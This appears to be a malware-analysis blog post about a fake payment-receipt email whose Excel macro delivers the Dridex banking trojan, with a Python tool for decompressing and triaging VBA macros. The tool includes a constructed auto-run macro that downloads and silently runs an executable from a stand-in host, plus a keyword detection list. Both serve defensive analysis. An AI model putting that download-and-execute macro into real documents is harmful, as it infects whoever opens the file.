From: email@example.com [mailto:firstname.lastname@example.org]
Sent: Monday, November 16, 2015 12:10 PM
Subject: DoT Payment Receipt
[Automated message. Do not reply]
Thank you for your payment. It is important that you print this receipt and record the receipt number as proof of your payment. You may be asked to provide your receipt details should you have an enquiry regarding this payment.
This email and any attachments are confidential and may contain legally privileged and/or copyright material. You should not read, copy, use or disclose any of the information contained in this email without authorisation. If you have received it in error please contact us at once by return email and then delete both emails. There is no warranty that this email is error or virus free.
I haven't seen this myself, but some contacts (thank you!) have. Attached is a file PaymentReceipt.xls which comes in several different versions; the sample I saw contained this malicious macro and had a VirusTotal detection rate of 5/54. According to my sources, the different versions download a malicious binary from one of the following:
This binary has a detection rate of 3/53, and that VirusTotal report and this Malwr report indicate malicious traffic to:
126.96.36.199 (Ministry Of Education, Thailand)
188.8.131.52 (Hetzner, Germany)
184.108.40.206 (Agava, Ltd)
220.127.116.11 (Post And Telecom Company, Vietnam)
The payload is the Dridex banking trojan.
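With 5/54 detections on the attachment, the practical way to confirm what a PaymentReceipt.xls like this does is to pull the macro source out and read it rather than wait for AV. The following is an added example (not code from the original post, and not the campaign's actual macro): Excel keeps VBA source inside the OLE2 workbook in compressed module streams (MS-OVBA section 2.4.1), so the block implements that decompression, a minimal matching encoder so a constructed sample can round-trip offline, and a keyword triage over the recovered source. The keyword list, the sample macro and its example.com URL are all constructed; extracting the raw stream from the .xls (for instance with olefile) is assumed to have been done already. In practice olevba from oletools does all of this; the point here is to show what it is doing.

```python
"""Offline triage of the VBA macro inside an .xls attachment (added example,
not code from the original post). Excel stores VBA source in compressed module
streams (MS-OVBA 2.4.1); decompress_vba() implements that algorithm and
compress_vba() is a minimal encoder so a constructed sample round-trips."""
import re
import struct

SUSPICIOUS = {  # constructed triage keyword list, not exhaustive
    "Workbook_Open": "auto-executes when the workbook opens",
    "URLDownloadToFile": "downloads a file from a URL",
    "Environ": "reads environment variables such as %TEMP%",
    "Shell": "executes a program",
}
URL_RE = re.compile(r"https?://[^\s\"']+")

def _copytoken_bits(chunk_pos):
    # Copy-token layout depends on how much of the current chunk is decoded:
    # offset gets max(ceil(log2(pos)), 4) bits, the length gets the rest.
    bit_count = max((chunk_pos - 1).bit_length(), 4)
    return bit_count, 0xFFFF >> bit_count  # (offset bits, length mask)

def decompress_vba(container):
    """Decompress an MS-OVBA compressed container into raw module source."""
    if container[0] != 0x01:
        raise ValueError("bad container signature")
    out, cur = bytearray(), 1
    while cur < len(container):
        header = struct.unpack_from("<H", container, cur)[0]
        if (header >> 12) & 0x7 != 0b011:
            raise ValueError("bad chunk signature")
        end = min(len(container), cur + (header & 0x0FFF) + 3)
        cur, chunk_start = cur + 2, len(out)
        if not header >> 15:  # flag 0: raw chunk of 4096 literal bytes
            out += container[cur:cur + 4096]
            cur += 4096
            continue
        while cur < end:
            flags, cur = container[cur], cur + 1
            for bit in range(8):
                if cur >= end:
                    break
                if (flags >> bit) & 1:  # copy token: (offset, length) pair
                    token = struct.unpack_from("<H", container, cur)[0]
                    cur += 2
                    bit_count, length_mask = _copytoken_bits(len(out) - chunk_start)
                    length = (token & length_mask) + 3
                    src = len(out) - ((token >> (16 - bit_count)) + 1)
                    for i in range(length):  # byte-wise so overlapping copies work
                        out.append(out[src + i])
                else:  # literal byte
                    out.append(container[cur])
                    cur += 1
    return bytes(out)

def compress_vba(data):
    """Minimal encoder: greedy matching, compressed chunks only."""
    out = bytearray(b"\x01")
    for start in range(0, len(data), 4096):
        chunk, body, pos = data[start:start + 4096], bytearray(), 0
        while pos < len(chunk):
            flags, tokens = 0, bytearray()
            for bit in range(8):
                if pos >= len(chunk):
                    break
                best_len = best_off = 0
                if pos:
                    bit_count, length_mask = _copytoken_bits(pos)
                    for off in range(1, min(pos, 1 << bit_count) + 1):
                        n = 0
                        while (n < length_mask + 3 and pos + n < len(chunk)
                               and chunk[pos + n] == chunk[pos - off + n]):
                            n += 1
                        if n > best_len:
                            best_len, best_off = n, off
                if best_len >= 3:
                    tokens += struct.pack("<H", (best_off - 1) << (16 - bit_count) | best_len - 3)
                    flags |= 1 << bit
                    pos += best_len
                else:
                    tokens.append(chunk[pos])
                    pos += 1
            body += bytes([flags]) + tokens
        out += struct.pack("<H", (len(body) - 1) | 0b011 << 12 | 1 << 15) + body
    return bytes(out)

def triage_vba(source):
    """Keyword hits, URLs and a verdict for decompressed macro source."""
    hits = {k: v for k, v in SUSPICIOUS.items() if k in source}
    chain = all(k in hits for k in ("Workbook_Open", "URLDownloadToFile", "Shell"))
    verdict = "downloader" if chain else "suspicious" if hits else "clean"
    return {"hits": hits, "urls": URL_RE.findall(source), "verdict": verdict}

SAMPLE_VBA = (  # constructed auto-run downloader, not the real campaign macro
    "Private Sub Workbook_Open()\r\n"
    '    p = Environ("TEMP") & "\\PaymentReceipt.exe"\r\n'
    '    URLDownloadToFile 0, "http://example.com/receipt.exe", p, 0, 0\r\n'
    "    Shell p, vbHide\r\nEnd Sub\r\n"
)

if __name__ == "__main__":
    print(triage_vba(decompress_vba(compress_vba(SAMPLE_VBA.encode())).decode()))
```

The verdict logic is deliberately simple: an auto-run entry point plus a download primitive plus a way to execute the result is the shape of a macro downloader like the one described above, and it is the combination, not any one keyword, that matters. Real samples obfuscate the strings (Chr() concatenation, StrReverse, split constants), so a keyword miss is not a clean bill of health; read the decompressed source.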